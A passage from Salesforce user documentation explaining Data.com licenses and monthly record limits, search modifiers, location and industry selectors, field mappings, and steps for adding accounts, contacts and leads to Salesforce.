also assign them all to a single user.

The number of records Data.com Users can still add or export during the current month. The balance
is updated every time a user adds records to Salesforce or exports records from Data.com. Additions
expire at the end of each month, as determined by your organization’s default time zone.

(month)
Balance

Tip:  To see how many records each user has added or exported, check the All Data.com Users
page. From Setup, click Data.com Administration > Users. Or, if your organization has access
to custom report types, you can use the Data.com Usage object to create a report that shows
more detailed usage information.

851

Understanding Data.com User Types, Licenses, and LimitsManaging the People and Organizations You Sell To



Here’s an example of how an organization manages Data.com User licenses and limits. The sales division of Universal Telco
has 14 sales reps, and they purchase 20 Data.com Prospector licenses, each of which has a record addition limit of 300. This
means that Data.com Users within the organization can add as many as 6,000 records per month. The Universal Telco
administrator distributes the Data.com Users’ monthly record addition limits as follows.

• Ten of the sales reps have limits of 300 each.
• Two of the sales reps have limits of 500 each.
• Two of the sales reps have a limit of 1,000 each.

Data.com List User Limits
Data.com List users share account, contact, and lead record additions from a pool. You can see the organization’s limit, and
the number of records each Data.com List User has added to Salesforce or exported. Only Data.com List Users can draw from
the organization’s pool limit. If a Data.com User wants to draw from the organization’s pool limit, you need to change that
user to a Data.com List User.

DefinitionField

The total number of records your organization’s Data.com List Users can add or export. All Data.com
List Users work from this limit, so if one Data.com List User reaches the limit, other users of that type
will not be able to add records.

Pool Record
Limit

The number of records Data.com List Users can still add. The balance is updated every time a user
adds records to Salesforce or exports records from Data.com.

Balance

Tip:  To see how many records each user has added or exported, check the All Data.com
Data.com Users page. From Setup, click Data.com Administration > Users. Or, if your
organization has access to custom report types, you can use the Data.com Usage object to create
a report that shows more detailed usage information.

Here’s an example of how an organization manages Data.com List User licenses and limits. The marketing division of Universal
Telco has four marketing reps. Each rep has a Data.com Prospector license and each is a Data.com List User. Universal Telco
purchases a record addition pool of 5,000 records. This means that together, all four marketing reps can add 5,000 records.
One rep might add 2,500 records, leaving 2,500 to be added by one or more of the other three users.

Data.com Clean

The Data.com Licenses & Limits page also provides information about your organization’s Clean capabilities and
implementation.

If your organization uses Data.com Prospector, users with those licenses can manually clean the account, contact, and lead
records they have access to.

If your organization has purchased a Data.com Clean product, you can also run automated jobs to clean records, and all
Salesforce users (not just those with aData.com Prospector licenses) can manually clean records.

DefinitionField

Which of your Salesforce users can manually clean records. If you’ve purchased Data.com Clean, all
Salesforce users can clean records. If you’ve purchased only Data.com Prospector, only users with licenses
can clean records.

Available To
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DefinitionField

The availability of automated clean jobs for your organization. If you’ve purchased Data.com Clean but
haven’t yet scheduled clean jobs, from Setup, click Data.com Administration > Clean > Jobs. If you
haven’t purchased Data.com Clean, click the Learn More... link to get product details.

Automation

See Also:
Using Data.com FAQ
Setting Up Data.com Users

SEARCHING FOR CRM RECORDS IN DATA.COM

Understanding Data.com Searches
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

Searching Data.com for CRM records is simple. Start your search by entering search criteria in the fields on the Data.com
tab. You can also use search modifiers to target and narrow your search results. Depending on your entries and selections, you
may end up with a large list of accounts or contacts. To find out how many, check the results list's header or footer. Click the
Reset Search link if you need to clear all your entries and selections. You'll see your search results until you start a new search
or refresh your browser page.

For account searches, the Data.com search results you get are based on the company name, the website of the parent company,
and the websites of the parent company’s subsidiaries and branch locations, if any, so your results may include companies that
you didn’t actually search for. For example, if you want to find Sun Microsystems and you enter either Sun Microsystems
or sun.com in the Company or Website field, the results will also include Oracle Corporation because Oracle is the parent
company of Sun Microsystems.

Also, account searches are based on both the Account Name field and the Tradestyle field. So, for example, if you are
looking for United Parcel Services, you can search on its tradestyle, UPS, and still see United Parcel Services,
Inc. in your search results.

Once you have a set of records, you can narrow your list by using filters if you need to. Just look for the filter categories at the
left of the page, and select the checkboxes for the filters you need. Some searches generate filter options that are specific to
your results. For example, if you want leads in Healthcare, Pharmaceuticals & Biotech industry—specifically
Doctors & Health Care Practitioners—the list of filters in the Title category might include Doctor, Chiropractor,
Dentist, and Office Manager. For searches that generate a large list of results for Title, Company Name, and Website
Domain Type filters, we show the 25 filters with the most search results. To see a shorter list of filters, narrow your initial
search.

853

Understanding Data.com SearchesFinding New Accounts, Contacts, and Leads with Data.com



Some filter categories are expanded automatically when you run a search, but you can click the links at the top of the Filters
panel to expand or collapse them all. As you select filters, the search results list is updated automatically.

For example, if you search for contacts from your IBM account detail page, the Data.com tab will open and automatically
enter IBM's URL, www.ibm.com, in the Company or Website field on the Find Contacts subtab. The search will generate
a list of thousands of IBM contacts all over the world. That's probably more than you need, so you can either:

• Refine your initial search by selecting location criteria (such as Australia or United States) or industry options
(like Computers & Electronics or Financial Services)

• Narrow your search results list by selecting filters such as Human Resources, C-Level, or Program Manager or

• Select IBM in the Company Name filter category.

By refining your search criteria and filtering your results, you can narrow your list from more than 30,000 contacts to the 25
or so you want to call or email.

See Also:
Data.com Contact Search Fields and Filters
Using Data.com Search Modifiers

Using Data.com Search Modifiers
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

No permissions requiredTo search Data.com for accounts:

No permissions requiredTo search Data.com for contacts:

When searching for Data.com accounts and contacts, you can use modifiers to target and narrow your search results. Here's
how modifiers work, field by field.

Company or Website

• To search for or exclude multiple companies, separate them with commas: ,. For example, salesforce.com,Apple
returns results for both salesforce.com and Apple (for example, Apple Computer, Inc. and Apple Inc.), or either one,
depending on Data.com data.

• To search for the exact name of a company, type the name within quotation marks: “ ”. For example, "Apple, Inc."
returns only results with the exact company name Apple, Inc.

• To exclude a company from your results, before the company name, type a minus sign: –. For example, –Oracle returns
a list of results that excludes Oracle. For company names with more than one word, after the minus sign, type the first part
of the name. For example, –Adobe returns a list of results that excludes Adobe Systems.
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• You can also use mixed search modifiers. For example, salesforce, –Microsoft, “GE Healthcare” returns
all results including salesforce (for example, salesforce and salesforce.com, inc.); it excludes all results containing Microsoft;
and it finds GE Healthcare but not GE Health Care.

Title

• To exclude a title, before the title, type a minus sign: –. For example: –buyer.
• To search for exact titles, type them within quotation marks: “ ”. For example: “Managing Director”.
• To search for multiple titles, separate them with commas: ,. For example: CEO,–Dr,“managing director”.

Name or Email

• To search for results for an individual element in this field—just Name or just Email—type that element followed by a
colon (:) and a space, then type the name, or email you're looking for. For example, Name: Marc Benioff returns
results with only the name Marc Benioff. Email: marcbenioff@salesforce.com returns results with only the
email address marcbenioff@salesforce.com.

• Modifiers will not work if you don't include “name: ” or “email: ”, and you can't mix and match these modifiers (for example,
using “name: ” and “email: ” in the same search).

• To search for multiple names or emails, separate them with commas: ,.
• To search for exact titles, names, or emails, type them within quotation marks: “ ”.
• To exclude a title, name, or email from your results, before the element, type a minus sign: –.

Location | City

• To search for multiple cities, separate them with commas: ,. For example, San Francisco, San Jose returns results
for both San Francisco and San Jose, or either one, depending on Data.com data.

• To search for exact cities, type them within quotation marks: “ ”. For example, “San Francisco”, won’t return results
for South San Francisco. Similarly, “South San Francisco” won’t return any results for San Francisco.

Location | Postal/ZIP Code

• To search for multiple postal or ZIP codes, separate them with commas: ,. For example, 94105,94122 returns results
for both 94105 and 94122, or either one, depending on Data.com data.

• To exclude a postal or ZIP code from your results, before the code, type a minus sign: –. For example, –94122 returns a
list of results that excludes 94122.

Location | Area Code

• To search for multiple area codes, separate them with commas: ,. For example, 312,708 returns results for both 312 and
708, or either one, depending on Data.com data.

• To exclude an area code from your results, before the area code , type a minus sign: –. For example, –708 returns a list of
results that excludes 708.

• To find area codes outside the United States and Canada, add the country calling code as a prefix. For example, the United
Kingdom's country calling code is 44, and London's area code is 20, so to find accounts or contacts in London by area
code, enter 4420 in the Area Code field.

See Also:
Understanding Data.com Searches
Data.com Contact Search Fields and Filters
Data.com Location Selector Fields
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Data.com Location Selector Fields
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

When you search for accounts and contacts in Data.com, use the location selector to add location criteria to your search query.
Here are the fields available with the location selector.

DefinitionField

The country or countries where you want to find accounts or
contacts. There are over 200 countries available for account

Country

searches. There is a limited number of countries available for
contact searches. To jump to a country in the list, type the
first few letters of the country you’re looking for.

The state or states where you want to find accounts or contacts.
This field also includes counties, provinces, and other distinct

State

geographical regions. You must select a single country first.
Not all countries have states. To jump to a state in the list,
type the first few letters of the state you’re looking for.

The city or cities, where you want to find accounts or contacts.
You must select a single country first. If the country you

City

selected has states available, you can narrow the city search to
include all available states or one specific state. You can use
search modifiers in this field to target and narrow your results.

The metro area or areas where you want to find accounts or
contacts. Also known as metropolitan and micropolitan

Metro Area

statistical areas, metro areas are available for the United States
only. You can’t use a metro area in a search with a city or a
state. To jump to a metro area in the list, type the first few
letters of the metro area you’re looking for.

The postal or ZIP code(s) where you want to find accounts
or contacts. You can use search modifiers in this field to target
and narrow your results.

Postal/ZIP Code

The area code(s) where you want to find accounts or contacts.
You can use search modifiers in this field to target and narrow
your results.

To find area codes outside the United States and Canada, add
the country calling code as a prefix. For example, the United

Area Code

Kingdom's country calling code is 44, and London's area code
is 20, so to find accounts or contacts in London by area code,
enter 4420 in the Area Code field.
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DefinitionField

Tip:  When using country calling codes, you should
also select a country. This will ensure you’re getting
only the results you want.

See Also:
Finding and Adding Accounts from Data.com
Finding and Adding Data.com Contacts from the Data.com Tab

Understanding the Data.com Industry Selector
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

When searching for accounts and contacts in Data.com, use the industry selector to add industries and subindustries to your
search criteria. Here’s how it works.
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1. Select the industry classification system your organization uses.

• NAICS (North American Industry Classification System): Used by business and government to classify North American
business establishments according to the type of economic activity. This system includes 20 industry sectors, each with
multiple levels of subindustries Industries and subindustries are identified by numeric code, up to six digits.

• SIC (Standard Industry Classification): Used by the United States government to classify business establishments
according to the type of economic activity. This system includes 10 industry sectors, each with multiple levels of
subindustries Industries and subindustries are identified by numeric code, up to four digits.

• Data.com Industry Categories: The Data.com system of classifying business establishments by industry and
subindustry.

You can select a different industry classification system at any time, but doing so will clear your selections.
2. Use the selection panels to explore industries and their subindustries and add them to your search. If an industry has a

numeric classification code, you’ll see it here. When you hover over an industry name, you’ll get two options.

• Click the industry name to view its subindustries, if any, in the right panel. If an industry has any available subindustries,

you’ll see an arrow  to the right of the industry name.
• Click Add to add the industry (including all its subindustries) to the Categories to search by (Categories) box.

When you click an industry name in the right panel, it moves to the left panel and its subindustries appear in the right
panel. You can continue moving through the industry levels in this manner, adding any industries and subindustries you

want to search on as you go. A circle  to the right of a subindustry name means you have reached the final level of
subindustries. When you add an industry to your search criteria, it appears in the Categories box and all of its subindustries

are automatically included. You’ll also see a solid green checkmark  next to its name. Only the industry, however,
appears in the Categories box.

To remove industries from the Categories box, hover over the industry name and click the . If you remove any
subindustries from the selection panel, the industry is removed from the Categories box, and its remaining subindustries

appear instead. (This partial selection is denoted by an outlined green checkmark  next to the industry name.) Keep in
mind that if you select some but not all subindustries within an industry, the number of selections in the Categories box
increases.

3. Use the navigation links at the top of the page to keep track of where you are within the industry levels. Click any link to
return to that industry level in the selection panels.

4. Click the Back arrow to move up one industry level.
5. All industries and subindustries that you add to your search appear in the Categories to search by box. You can remove

individual selections by clicking the  next to the industry or subindustry name. Clicking Clear all removes all your
selections.

6. There’s a limit on how many industries and subindustries you can add to one search. If you exceed the limit, you'll need
to remove selections in order to continue your search.

7. If the Categories to search by box includes a long list of industries, you may need to click the arrow to expand the box to
view them all.

Here’s an example of how the industry selector works. John is looking for companies that manufacture computers. He decides
to use the North American Industry Classification System (NAICS) and begins by clicking the Manufacturing industry to
reveal its subindustries, which include Food Manufacturing, Machinery Manufacturing, and lots more. He finds Computer
and Electronic Product Manufacturing, and clicks it, moving it to the left panel to reveal its subindustries in the right panel.
He continues to navigate deeper in to the industry levels in this manner, clicking through subindustries until he ultimately
finds what he’s looking for: Computer and Peripheral Equipment Manufacturing. John clicks Add to add two subindustries,
Electronic Computer Manufacturing and Computer Storage Device Manufacturing, to the Categories to search by box.
Those selections remain in the Categories box even if he navigates to other levels in the selection panel and adds other industries.
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When he is finished adding industries to the Categories box, he does a last review of his selections, then happily clicks Done
to return to the Data.com tab to complete his search.

See Also:
Understanding Data.com Searches
Saving Data.com Searches

Understanding Data.com Industry Mapping
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

Data.com accounts come from Dun & Bradstreet (D&B) and have up to six SIC (Standard Industry Classification) and six
NAICS (North American Industry Classification System) codes, which classify businesses and their locations according to
their major economic activities.

Data.com uses an account’s primary SIC code to determine the value of the Industry field on account records and account
cards. By using only the primary SIC code for this industry mapping, Data.com is able to provide a more consistent and
accurate value in the Industry field, which leads to more relevant search results, regardless of the industry classification
system you use in your search query.

For example, if you use the SIC system and select the Computer Peripheral Equipment industry, which maps to
Electronics, your results will include all accounts with a value of Electronics in the Industry field. If you use the Data.com
Industry Categories classification system and select the Computers and Electronic industry, which also maps to
Electronics, your results will again include all accounts with a value of Electronics in the Industry field.

Note:  The subindustries under Government in the Data.com Industry Categories classification system are currently
unavailable due to mapping limitations between the Data.com Industry Categories and the SIC system.

See Also:
Default Data.com-to-Salesforce Field Mappings

Default Data.com-to-Salesforce Field Mappings
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

If you use Data.com Premium Prospector or Data.com Premium Clean, you have access to D&B Company records, which
include over 70 fields from Dun & Bradstreet (D&B). Several of those D&B fields are also available on accounts, contacts,
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and lead records but sometimes with a different field name. This topic details the default field mappings between Data.com’s
D&B fields and Salesforce account, contact, and lead fields.

System administrators can set up custom field mappings.

Accounts

Account FieldD&B Field

Annual RevenueAnnual Sales Volume

DescriptionCompany Description

D-U-N-S NumberD-U-N-S Number

FaxFacsimile Number

Account SiteLocation Type

Shipping AddressMailing Address

EmployeesNumber of Employees–Total

OwnershipOwnership Type Indicator

Billing AddressPrimary Address

Account NamePrimary Business Name

NAICS CodePrimary NAICS Code

NAICS DescriptionPrimary NAICS Description

SIC CodePrimary SIC Code

SIC DescriptionPrimary SIC Description

TradestylePrimary Tradestyle

PhoneTelephone Number

Ticker SymbolTicker Symbol

WebsiteURL

Year StartedYear Started

Contacts

Contact FieldD&B Field

Mailing AddressPrimary Address

Account NamePrimary Business Name

Leads

Lead FieldD&B Field

Annual RevenueAnnual Sales Volume
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Lead FieldD&B Field

DescriptionCompany Description

Company D-U-N-S NumberD-U-N-S Number

No. of EmployeesNumber of Employees–Total

AddressPrimary Address

CompanyPrimary Business Name

See Also:
Understanding Data.com Industry Mapping
Customizing Data.com-to-Salesforce Field Mappings
Default Data.com-to-Salesforce Field Mappings

Saving Data.com Searches
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

No permissions requiredTo save a Data.com search:

Need to run a specific Data.com search on a regular basis—to find new contacts for your favorite accounts, or new leads for
your target markets? You can. Just create a search and save it and you can run it again as often as you like. Note that saving a
search does not save a static list of results. It saves the criteria and filters you define, so when you rerun the search, you can find
the latest matching records. Saved searches are listed to the left of the search tabs, with the most recently run saved search at
the top.

You can always modify the search criteria or filters after you run a saved search. If you save the search again, you'll get the
option to rename it.

1. Start from the tab for the kind of records you want: contacts or accounts.
2. Enter your search criteria, and filter your results if you need to.
3. Click Save Search.

The name of the save search appears in the Saved Search list.
4. To rerun your saved search, just select its name from the Saved Searches list.

5. If you need to delete a saved search, click Delete ( ) next to its name.
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Note:  You can have up to 25 saved searches at a time.

See Also:
Understanding Data.com Searches

Data.com Account Search Fields and Filters
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

Data.com Account Search Fields

DefinitionField

The name of a company or the URL of its website.

For URLs, use the format companyname.domaintype; for
example, universaltelco.com. Don't enter protocols,

Company or Website

such as http: or https:. You can use search modifiers in
this field to target and narrow your results.

A drop-down that lets you select location criteria, such as
country, state, and city. Use the location selector to add
location criteria to your search query.

Location

The industry or industries and any related sub-industries for
which you want to find accounts. Use the industry selector to
add industry categories to your search query.

Industry

Data.com Account Filter Categories

DefinitionFilter Category

The Show Inactive Records checkbox lets you show or
hide inactive records. Inactive account records are those flagged

Options

in Data.com as containing out-of-date or inaccurate
information, or representing companies that are
non-marketable. A non-marketable company, as defined by
D&B, is one that is out of business or has requested exclusion
from the D&B database. It also includes companies whose
D&B record has not been updated in the past 24 months or
does not include a complete business name, a valid physical
or mailing address, a valid phone number, or an SIC code.
Inactive records are hidden by default.
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DefinitionFilter Category

A manually entered range for the number of employees within
an organization. Results are based on the Number of

Employees

Employees—Total field. You can use abbreviations for
multiples of thousands (K for thousand, M for million, and B
for billion). For example, 10K converts to 10,000. Leave the
Min or the Max field blank to increase your search results. For
example, a blank Min field will return all zero (0) or blank
values.

A manually entered range for an organization's yearly revenue.
You can use abbreviations for multiples of thousands (K for

Revenue

thousand, M for million, and B for billion). For example, 10K
converts to 10,000. Leave the Min or the Max field blank to
increase your search results. For example, a blank Min field
will return all zero (0) or blank values.

A list of organizational types, such as Single Location,
Headquarters, and Branch

Location Type

A list of organization ownership types, such as Public,
Private, and Government.

Ownership

A list of website domain types, such as .com, .org, and so
on.

Website Domain Type

For searches that generate a large list of results, we show the
25 filters with the most results. To see a shorter list, narrow
your initial search.

See Also:
Understanding Data.com Searches

863

Data.com Account Search Fields and FiltersManaging the People and Organizations You Sell To



Data.com Contact Search Fields and Filters
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

Data.com Contact Search Fields

DefinitionField

The name of the company you want to find contacts for or
the URL of its website.

For URLs, use the format companyname.domaintype; for
example, universaltelco.com. Don't enter protocols,

Company or Website

such as http: or https:. You can use search modifiers in
this field to target and narrow your results.

The title of a contact or contacts. You can use search modifiers
in this field to target and narrow your results.

Title

A drop-down that lets you select location criteria, such as
country, state, and city. Use the location selector to add
location criteria to your search query.

Location

The industry or industries and any related sub-industries for
which you want to find contacts. Use the industry selector to
add industry categories to your search query.

Industry

The name, or email address of a specific contact. You can use
search modifiers in this field to target and narrow your results.

Name or Email

Data.com Contact Filter Categories

DefinitionFilter Category

The Show Inactive Records checkbox lets you show or
hide inactive records. Inactive contact records are those flagged

Options

in Data.com as containing out-of-date or inaccurate
information. Inactive records are hidden by default.

A list of companies found in your initial search results. For
example, if you search for a contact named William Chen,

Company Name

all companies that have contacts named William Chen are
listed. For searches that generate a large list of results, we show
the 25 filters with the most results. To see a shorter list, narrow
your initial search.

A list of typical departments within organizations.Department
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DefinitionFilter Category

A list of typical levels within organizations.Level

A set of titles found in your initial search results. For example,
if you search for contacts in the Healthcare,

Title

Pharmaceuticals & Biotech industry and Doctors &
Health Care Practitioners sub-industry, the list of
title filters might include Chiropractor, Dentist, and
Office Manager. For searches that generate a large list of
results, we show the 25 filters with the most results. To see a
shorter list, narrow your initial search.

A manually entered range for the number of employees within
an organization. Results are based on the Number of

Employees

Employees—Total field. You can use abbreviations for
multiples of thousands (K for thousand, M for million, and B
for billion). For example, 10K converts to 10,000. Leave the
Min or the Max field blank to increase your search results. For
example, a blank Min field will return all zero (0) or blank
values.

A manually entered range for an organization's yearly revenue.
You can use abbreviations for multiples of thousands (K for

Revenue

thousand, M for million, and B for billion). For example, 10K
converts to 10,000. Leave the Min or the Max field blank to
increase your search results. For example, a blank Min field
will return all zero (0) or blank values.

A list of organizational types, such as Single Location,
Headquarters, and Branch

Location Type

A list of organization ownership types, such as Public,
Private, and Government.

Ownership

A list of website domain types, such as .com, .org, and so
on.

Website Domain Type

For searches that generate a large list of results, we show the
25 filters with the most results. To see a shorter list, narrow
your initial search.

See Also:
Understanding Data.com Searches
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FINDING AND ADDING CRM RECORDS

Finding and Adding Account, Contact, and Lead Records
From Data.com

Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Create” on accountsTo add or export accounts from Data.com:

“Create” on contactsTo add or export contacts from Data.com:

“Create on leadsTo add or export leads from Data.com:

No permissions requiredTo save a Data.com search:

Search for Data.com accounts and contacts, and add them to Salesforce. Add your contact search results as either contacts or
leads. You can also export your results, and save your searches. Here are all your options.

• Add Data.com accounts from the Data.com tab

• Add Data.com contacts from Data.com tab

• Add Data.com contacts from an account record

• Add Data.com contacts as leads from the Data.com tab

• Export Data.com accounts to a .csv file.

• Export Data.com contacts or leads to a .csv file

• Save account and contact searches for future use

See Also:
Understanding Data.com Searches
Guidelines for Exporting and Importing Data.com Records
Exploring Data.com Accounts from the Account Card
Exploring Data.com Contacts from the Contact Card
Data.com Product Suite Overview
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Finding and Adding Accounts from Data.com
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Create” on accountsTo add accounts from Data.com:

Search Data.com for accounts then add the records you want to Salesforce. Search by company, location, or industry, then
use filters as needed to further refine your results.

If you use Data.com Premium Prospector, when you add an account from Data.com, a corresponding D&B Company record
(if one exists in Data.com) is automatically created in Salesforce and linked to the account record via its D&B Company field.

1. Click the Data.com tab.
2. Click Find Accounts.
3. Enter or select your search criteria. When you click the selection box in the Industry field, for example, you’ll see the

Industry Selector, where you can use industry classifications to select from extensive lists of industries and subindustries
to build an industry query as part of your search criteria. When you click the selection box in the Location field, you’ll
see the Location Selector, where you can build a location query as part of your search criteria.

4. Click Search. Results are sorted by number of active contacts.
To show records that have been flagged as inactive, under Options, select Show Inactive Records. Inactive records
are marked with .

5. If the results list is long, you can:

• Sort the results by any table heading. The Updated heading, for example, sorts results by when they were last updated.
• Jump to a page by entering a number in the Page field.
• Click the arrows to move from page to page.

6. If you don't see what you’re looking for, use filters to narrow your results. Expand filter categories as needed. Enter a range
or select the checkbox next to each filter you want to apply.

7. Add all accounts or a selection to Salesforce.

• To add all accounts, click Add to Salesforce and select All.
• To add selected accounts, select the ones you want, then click Add to Salesforce and choose Selected.

8. Click Continue.
Adding more than 200 records can take a few minutes. If you add that many, we'll send you an email when the process is
complete.
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9. From the confirmation message, click Go to Accounts to view the list of new records on the Accounts home page.

See Also:
Guidelines for Adding Data.com Records to Salesforce
Data.com Account Search Fields and Filters
Exploring Data.com Accounts from the Account Card
Understanding Record Icons in Data.com Search Results
Understanding Data.com Searches

Finding and Adding Contacts from Data.com
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Create” on contactsTo add contacts from Data.com:

“Read” on accounts

AND

“Create” on contacts

To add Data.com contacts from an account:

Search Data.com for contacts and filter your results if you need to. Use email and phone to start making connections, or add
your results to Salesforce—as contacts or as leads. If you add records as contacts, you'll be prompted to associate them with a
single account, so keep that in mind when you define your search.

If you want to get contacts for a specific account, start there and generate a list on the Data.com tab. Add the contacts you
want to Salesforce, and they're automatically associated with the account.

• Finding and Adding Data.com Contacts from the Data.com Tab

• Getting Data.com Contacts from an Account

See Also:
Understanding Record Icons in Data.com Search Results
Understanding Data.com Searches
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Finding and Adding Data.com Contacts from the Data.com
Tab

Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

No permissions requiredTo search Data.com for contacts:

“Create” on contactsTo add Data.com contacts:

“Create” on accountsTo create an account when adding contacts:

Want to search for contacts across multiple companies, locations, or industries? Start from the Data.com tab. If you add records
as contacts, you'll be prompted to associate them with a single account, so keep that in mind when you define your search.

1. Click the Data.com tab.
2. Click Find Contacts.
3. Enter or select your search criteria. When you click the selection box in the Industry field, for example, you’ll see the

Industry Selector, where you can use industry classifications to select from extensive lists of industries and subindustries
to build an industry query as part of your search criteria. When you click the selection box in the Location field, you’ll
see the Location Selector, where you can build a location query as part of your search criteria.

4. Click Search.
Results are sorted alphanumerically. To show records that have been flagged as inactive, under Options, select Show
Inactive Records. Inactive records are marked with .

5. If the results list is long, you can:

• Sort the results by any table heading. The Updated heading, for example, sorts results by when they were last updated.
• Jump to a page by entering a number in the Page field.
• Click the arrows to move from page to page.

Sorting and page navigation only work for lists of fewer than 100,000 records.

6. If you don't see what you're looking for, use filters to narrow your results. Expand filter categories as needed. Enter a range
or select the checkbox next to each filter you want to apply.
The list updates automatically.

7. Add all contacts or a selection to Salesforce.

• To add all contacts, click Add to Salesforce and select All.
• To add selected contacts, first select the ones you want, then click Add to Salesforce and choose Selected.

You'll get a confirmation message showing the number of records you’re adding.
8. Select Contacts.

Enter or select the account you want to associate the contacts with. You can associate only one account. If you need to
create the account to associate, use the lookup.
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9. Click Continue.
10. Click Go to Account to return to the account record.

Tip:  You can also add Data.com contacts directly from an account. Just start your search from that account's detail
page.

See Also:
Guidelines for Adding Data.com Records to Salesforce
Data.com Contact Search Fields and Filters
Exploring Data.com Contacts from the Contact Card
Understanding Record Icons in Data.com Search Results
Understanding Data.com Searches

Getting Data.com Contacts from an Account
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Read” on accounts

AND

“Create” on contacts

To get Data.com contacts from an account:

Need contacts for an account? Get them from Data.com with the click of a button on the account's detail page. Just be sure
the Get Contacts button has been added to the Account page layout.

1. Go to the detail page of the account you want to add contacts for.
2. Click Get Contacts. From the drop-down, either:

• Select a filter to narrow your results by level or department, or
• Select All... to see all contacts for the account.

The Data.com tab opens and displays a list of contacts that match the account name and any filters you selected. For
example, if you want to get manager contacts at Universal Telco, go to Universal Telco's account detail page. Click Get
Contacts and under By Level, select the Manager-Level filter. The Data.com tab opens with a list of managers at
Universal Telco.

3. Select more filters if you need a more targeted list. Expand filter categories as needed. Enter a range or select the checkbox
next to each filter you want to apply.

4. Add all contacts or a selection to Salesforce.

• To add all contacts, click Add to Salesforce.
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• To add selected contacts, first select the ones you want, then click Add to Salesforce and choose Selected.

You'll get a confirmation message showing the number of contacts you're adding.
5. Select Contacts to add the records as contacts associated with the account you started from.

They'll be associated with the account you started from.
6. Click Continue to add the records.
7. Click Go to Account to return to the account record.

See Also:
Finding and Adding Data.com Contacts from the Data.com Tab
Adding Data.com Contacts as Leads
Understanding Record Icons in Data.com Search Results
Data.com Contact Search Fields and Filters

Adding Data.com Contacts as Leads
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Create” on leadsTo add Data.com contacts as leads:

Need leads? Get them from Data.com. First search for contacts, then add the contacts you want to Salesforce as leads.

If you use Data.com Premium Prospector, when you add a lead from Data.com, a corresponding D&B Company record (if
one exists in Data.com) is automatically created in Salesforce and linked to the lead record via its D&B Company field.

1. Search for contacts.
2. Select the contacts you want to add and click Add to Salesforce.
3. Select Leads to add the records as leads and click Continue.
4. Click Go to Leads to view the list of new records on the Leads home page.

See Also:
Finding and Adding Contacts from Data.com
Getting Data.com Contacts from an Account
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Guidelines for Adding Data.com Records to Salesforce
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

Search Data.com for accounts, contacts, and leads, and if you have a Data.com license, you can add the records you want to
Salesforce. Here are some things to consider when you add Data.com records to Salesforce.

• When you add Data.com contacts or accounts, each one counts against your monthly record addition limit. If you add a
record as a contact, and then add the same record as a lead, the record will count against your monthly addition limit only
once. The same is true when you add a record as a lead first, and then add the same record as a contact. Similarly, if you
add records you’ve already exported from Data.com, the added records don’t count against your monthly record addition
limit.

• You can’t add records you’ve already added to Salesforce ( ), unless either the record has been deleted from Salesforce, or
your organization allows duplicates.

• If you can’t add one or more records to Salesforce because of errors, we’ll notify you and provide the error details in a .csv
file.

• You can add only as many records as your monthly addition limit allows. If you’re trying to add a number of records that
exceeds your limit, you’ll see a message that lets you know the number of remaining additions you have. If you’ve reached
your monthly record addition limit, you can’t add any more.

• Regardless of your monthly addition limit or the number of remaining additions you have, you can’t add more than 100,000
records at a time. If you try, you’ll see a prompt to refine your list.

• If your search produces a large number of results, you won’t see all data past page 10. If this happens, have your system
administrator contact salesforce.com Customer Support to enable unlimited view.

See Also:
Finding and Adding Account, Contact, and Lead Records From Data.com
Resolving Data.com Record Addition Errors
Understanding Record Icons in Data.com Search Results
Guidelines for Exporting and Importing Data.com Records

Understanding Record Icons in Data.com Search Results
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

When you search Data.com for accounts and contacts, you might see one or more icons next to the records in your search
results.
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DefinitionIcon

The record is already in Salesforce. Either of these conditions
represents a record that is already in Salesforce

Already in Salesforce

• The record was added to Salesforce from the Data.com
tab. In the process, it was purchased from Data.com and
counted against your monthly addition limit.

• The record was manually created in Salesforce and later
matched by Data.com Clean. The record was not
purchased from Data.com and not counted against your
monthly addition limit.

The record was already purchased from Data.com. Either of
these conditions represents a record that has been purchased
from Data.com.

Already Purchased

